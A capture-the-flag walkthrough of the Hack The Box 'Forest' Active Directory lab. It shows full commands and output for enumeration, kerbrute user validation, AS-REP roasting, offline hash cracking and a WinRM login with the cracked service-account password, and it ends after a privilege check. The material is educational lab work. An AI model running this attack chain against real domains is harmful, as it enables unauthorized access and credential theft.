Starting of HTB Active Directory Track . preparation for PNPT — OSCP Certifications. Let's dive in.
Initial Enumeration:
The first step will always be your Nmap scan:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ nmap -A -p- 10.129.29.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-05-05 10:12 CDT
Nmap scan report for 10.129.29.48
Host is up (0.0079s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-05 15:19:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/5%OT=53%CT=1%CU=33149%PV=Y%DS=2%DC=T%G=Y%TM=69FA0
OS:940%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%T
OS:S=A)OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=
OS:M552NW8ST11%O6=M552ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2
OS:000)ECN(R=Y%DF=Y%T=80%W=2000%O=M552NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h26m49s, deviation: 4h02m30s, median: 6m48s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2026-05-05T08:20:49-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2026-05-05T15:20:50
|_ start_date: 2026-05-05T15:17:45
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 7.57 ms 10.10.14.1
2 7.80 ms 10.129.29.48
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.15 seconds
With the scan above, we confirm that this is an AD machine with the following info:
Port: 88 => open
port 389 => open
Domain name: htb.local
Computer name: FOREST
LDAP Enumeration:
──╼ [★]$ ldapsearch -x -H ldap://10.129.29.48 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
With the scan above, I was able to confirm the Domain name: htb.local
I tried SMB enumeration but no luck from that angle.
─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ smbclient -L //10.129.29.48 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.29.48 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
RPC Enumeration
I moved on to check RPC null session and I got back some users:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ rpcclient -U "" -N 10.129.29.48
rpcclient $> usersenum
command not found: usersenum
rpcclient $> hellp
command not found: hellp
rpcclient $> help
--------------- ----------------------
UNIXINFO
getpwuid Get shell and homedir
uidtosid Convert uid to sid
--------------- ----------------------
rpcclient $> enumdomusers
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $>
I also check for the domain groups is in the RPCclient prompt:
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
I decided to use enum4linux to check if I would get back the same users as RPC, and I got back not just the users, but also password policy and more:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ enum4linux 10.129.29.48
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.29.48
[*] Username ......... ''
[*] Random Username .. 'mkzhqzea'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
=====================================
| Listener Scan on 10.129.29.48 |
=====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
====================================================
| Domain Information via LDAP for 10.129.29.48 |
====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: htb.local
===========================================================
| NetBIOS Names and Workgroup/Domain for 10.129.29.48 |
===========================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
=========================================
| SMB Dialect Check on 10.129.29.48 |
=========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
===========================================================
| Domain Information via SMB session for 10.129.29.48 |
===========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: FOREST
NetBIOS domain name: HTB
DNS domain: htb.local
FQDN: FOREST.htb.local
Derived membership: domain member
Derived domain: HTB
=========================================
| RPC Session Check on 10.129.29.48 |
=========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
===================================================
| Domain Information via RPC for 10.129.29.48 |
===================================================
[+] Domain: HTB
[+] Domain SID: S-1-5-21-3072663084-364016917-1341370565
[+] Membership: domain member
===============================================
| OS Information via RPC for 10.129.29.48 |
===============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows Server 2016 Standard 14393
OS version: '10.0'
OS release: '1607'
OS build: '14393'
Native OS: Windows Server 2016 Standard 14393
Native LAN manager: Windows Server 2016 Standard 6.3
Platform id: null
Server type: null
Server type string: null
=====================================
| Users via RPC on 10.129.29.48 |
=====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 31 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 31 user(s) via 'enumdomusers'
[+] After merging user results we have 31 user(s) total:
'1123':
username: $331000-VK4ADACQNUCA
name: (null)
acb: '0x00020015'
description: (null)
'1124':
username: SM_2c8eef0a09b545acb
name: Microsoft Exchange Approval Assistant
acb: '0x00020011'
description: (null)
'1125':
username: SM_ca8c2ed5bdab4dc9b
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1126':
username: SM_75a538d3025e4db9a
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1127':
username: SM_681f53d4942840e18
name: Discovery Search Mailbox
acb: '0x00020011'
description: (null)
'1128':
username: SM_1b41c9286325456bb
name: Microsoft Exchange Migration
acb: '0x00020011'
description: (null)
'1129':
username: SM_9b69f1b9d2cc45549
name: Microsoft Exchange Federation Mailbox
acb: '0x00020011'
description: (null)
'1130':
username: SM_7c96b981967141ebb
name: E4E Encryption Store - Active
acb: '0x00020011'
description: (null)
'1131':
username: SM_c75ee099d0a64c91b
name: Microsoft Exchange
acb: '0x00020011'
description: (null)
'1132':
username: SM_1ffab36a2f5f479cb
name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
acb: '0x00020011'
description: (null)
'1134':
username: HealthMailboxc3d7722
name: HealthMailbox-EXCH01-Mailbox-Database-1118319013
acb: '0x00000210'
description: (null)
'1135':
username: HealthMailboxfc9daad
name: HealthMailbox-EXCH01-001
acb: '0x00000210'
description: (null)
'1136':
username: HealthMailboxc0a90c9
name: HealthMailbox-EXCH01-002
acb: '0x00000210'
description: (null)
'1137':
username: HealthMailbox670628e
name: HealthMailbox-EXCH01-003
acb: '0x00000210'
description: (null)
'1138':
username: HealthMailbox968e74d
name: HealthMailbox-EXCH01-004
acb: '0x00000210'
description: (null)
'1139':
username: HealthMailbox6ded678
name: HealthMailbox-EXCH01-005
acb: '0x00000210'
description: (null)
'1140':
username: HealthMailbox83d6781
name: HealthMailbox-EXCH01-006
acb: '0x00000210'
description: (null)
'1141':
username: HealthMailboxfd87238
name: HealthMailbox-EXCH01-007
acb: '0x00000210'
description: (null)
'1142':
username: HealthMailboxb01ac64
name: HealthMailbox-EXCH01-008
acb: '0x00000210'
description: (null)
'1143':
username: HealthMailbox7108a4e
name: HealthMailbox-EXCH01-009
acb: '0x00000210'
description: (null)
'1144':
username: HealthMailbox0659cc1
name: HealthMailbox-EXCH01-010
acb: '0x00000210'
description: (null)
'1145':
username: sebastien
name: Sebastien Caron
acb: '0x00000210'
description: (null)
'1146':
username: lucinda
name: Lucinda Berger
acb: '0x00000210'
description: (null)
'1147':
username: svc-alfresco
name: svc-alfresco
acb: '0x00010210'
description: (null)
'1150':
username: andy
name: Andy Hislip
acb: '0x00000210'
description: (null)
'1151':
username: mark
name: Mark Brandt
acb: '0x00000210'
description: (null)
'1152':
username: santi
name: Santi Rodriguez
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: Administrator
acb: '0x00000010'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00000011'
description: Key Distribution Center Service Account
'503':
username: DefaultAccount
name: (null)
acb: '0x00000215'
description: A user account managed by the system.
======================================
| Groups via RPC on 10.129.29.48 |
======================================
[*] Enumerating local groups
[+] Found 5 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 29 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 38 group(s) via 'enumdomgroups'
[+] After merging groups results we have 72 group(s) total:
'1101':
groupname: DnsAdmins
type: local
'1102':
groupname: DnsUpdateProxy
type: domain
'1104':
groupname: Organization Management
type: domain
'1105':
groupname: Recipient Management
type: domain
'1106':
groupname: View-Only Organization Management
type: domain
'1107':
groupname: Public Folder Management
type: domain
'1108':
groupname: UM Management
type: domain
'1109':
groupname: Help Desk
type: domain
'1110':
groupname: Records Management
type: domain
'1111':
groupname: Discovery Management
type: domain
'1112':
groupname: Server Management
type: domain
'1113':
groupname: Delegated Setup
type: domain
'1114':
groupname: Hygiene Management
type: domain
'1115':
groupname: Compliance Management
type: domain
'1116':
groupname: Security Reader
type: domain
'1117':
groupname: Security Administrator
type: domain
'1118':
groupname: Exchange Servers
type: domain
'1119':
groupname: Exchange Trusted Subsystem
type: domain
'1120':
groupname: Managed Availability Servers
type: domain
'1121':
groupname: Exchange Windows Permissions
type: domain
'1122':
groupname: ExchangeLegacyInterop
type: domain
'1133':
groupname: $D31000-NSEL5BRJ63V7
type: domain
'1148':
groupname: Service Accounts
type: domain
'1149':
groupname: Privileged IT Accounts
type: domain
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'5101':
groupname: test
type: domain
'512':
groupname: Domain Admins
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'516':
groupname: Domain Controllers
type: domain
'517':
groupname: Cert Publishers
type: local
'518':
groupname: Schema Admins
type: domain
'519':
groupname: Enterprise Admins
type: domain
'520':
groupname: Group Policy Creator Owners
type: domain
'521':
groupname: Read-only Domain Controllers
type: domain
'522':
groupname: Cloneable Domain Controllers
type: domain
'525':
groupname: Protected Users
type: domain
'526':
groupname: Key Admins
type: domain
'527':
groupname: Enterprise Key Admins
type: domain
'544':
groupname: Administrators
type: builtin
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'548':
groupname: Account Operators
type: builtin
'549':
groupname: Server Operators
type: builtin
'550':
groupname: Print Operators
type: builtin
'551':
groupname: Backup Operators
type: builtin
'552':
groupname: Replicator
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
'575':
groupname: RDS Remote Access Servers
type: builtin
'576':
groupname: RDS Endpoint Servers
type: builtin
'577':
groupname: RDS Management Servers
type: builtin
'578':
groupname: Hyper-V Administrators
type: builtin
'579':
groupname: Access Control Assistance Operators
type: builtin
'580':
groupname: Remote Management Users
type: builtin
'581':
groupname: System Managed Accounts Group
type: builtin
'582':
groupname: Storage Replica Administrators
type: builtin
======================================
| Shares via RPC on 10.129.29.48 |
======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
=========================================
| Policies via RPC for 10.129.29.48 |
=========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: not set
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
=========================================
| Printers via RPC for 10.129.29.48 |
=========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 7.12 seconds
Now I have list os users and I need to format the usernames in a readable format, so I came up with the onliner below:
grep "username:" users.txt | awk '{gsub(/^\$/, "", $2); print $2}' > usernames.txt
Now with the list of domain users ready, let's check it with kerbrute to be sure we have valid users.
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ ./kerbrute_linux_amd64 userenum -d htb.local usernames.txt --dc 10.129.29.48
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/05/26 - Ronnie Flathers @ropnop
2026/05/05 11:06:48 > Using KDC(s):
2026/05/05 11:06:48 > 10.129.29.48:88
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxc3d7722@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxfc9daad@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox968e74d@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox670628e@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxfd87238@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxb01ac64@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailboxc0a90c9@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: sebastien@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox7108a4e@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox0659cc1@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: svc-alfresco@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: lucinda@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox6ded678@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: santi@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: mark@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: andy@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: HealthMailbox83d6781@htb.local
2026/05/05 11:06:48 > [+] VALID USERNAME: Administrator@htb.local
2026/05/05 11:06:48 > Done! Tested 31 usernames (18 valid) in 0.045 seconds
bash
We got back 18 valid domain users from our list of 31 users, Now let's check AS-REP Roasting for all the valid usernames to see if there would any of the user with DONT_REQ_PREAUTH enabled, if we found any of the user with this enabled, we would get back the user's hash and we can take off-line and crack it.
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ GetNPUsers.py 'htb.local/' -usersfile valid_username.txt -format hashcat -outputfile forestbox.aspreroast -dc-ip 10.129.29.48
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:e1f287c1c6364d475b6d5bbec387512d$b816a045addd996ab16093ef48579ccd1439f796148d0a903d0934b93ad5e94c2ce3c35156137d253c4eef31999e57dcaba0060fd910d7b693c51c768b80c02c4324f11b1e2350b7e2ad2b65e918f7e80e9de116d9a7f2bef847492c0bf11857412ee446a258040373634b67651a4ee8243e2db2380a4dad3d49c9eb13a58b0d7598674726803e4d8ffbd51151b67bf7161441445c0a0a4bbed4ba2c3732ea4f36b79d98d0b4e3a1c707ac21d3f87b38c67e4b1099b672274ec89dca4302650ff49911f2d9b23937722b195a3973b4dd48a557587b099cf0b966cfe27452ceab74f9882eaf89
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
Great!!! We got back svc-alfresco hash. Let's take the hash off-line and see if we can crack the hash with hashcat.
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ hashcat -m 18200 forestbox.aspreroast /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped
OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 7543 32-Core Processor, 3923/7910 MB (988 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5asrep$23$svc-alfresco@HTB.LOCAL:e1f287c1c6364d475b6d5bbec387512d$b816a045addd996ab16093ef48579ccd1439f796148d0a903d0934b93ad5e94c2ce3c35156137d253c4eef31999e57dcaba0060fd910d7b693c51c768b80c02c4324f11b1e2350b7e2ad2b65e918f7e80e9de116d9a7f2bef847492c0bf11857412ee446a258040373634b67651a4ee8243e2db2380a4dad3d49c9eb13a58b0d7598674726803e4d8ffbd51151b67bf7161441445c0a0a4bbed4ba2c3732ea4f36b79d98d0b4e3a1c707ac21d3f87b38c67e4b1099b672274ec89dca4302650ff49911f2d9b23937722b195a3973b4dd48a557587b099cf0b966cfe27452ceab74f9882eaf89:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:e1f287c1c6364d...2eaf89
Time.Started.....: Tue May 5 11:16:34 2026, (2 secs)
Time.Estimated...: Tue May 5 11:16:36 2026, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 1896.9 kH/s (0.80ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4083712/14344385 (28.47%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: s523480 -> s3r3ndipit
Started: Tue May 5 11:16:25 2026
Stopped: Tue May 5 11:16:37 2026
We are able to crack the hash, now we have our innitial credentials svc-alfresco:s3rvice, let's try to get on the host with evil-winrm
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-eqxvgplaz4]─[~]
└──╼ [★]$ evil-winrm -i 10.129.29.48 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
I was able to lunch evil-winrm successfully with the credentials.
User and Domain Enumeration from Domain joined host
*Evil-WinRM* PS C:\Users> net users
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
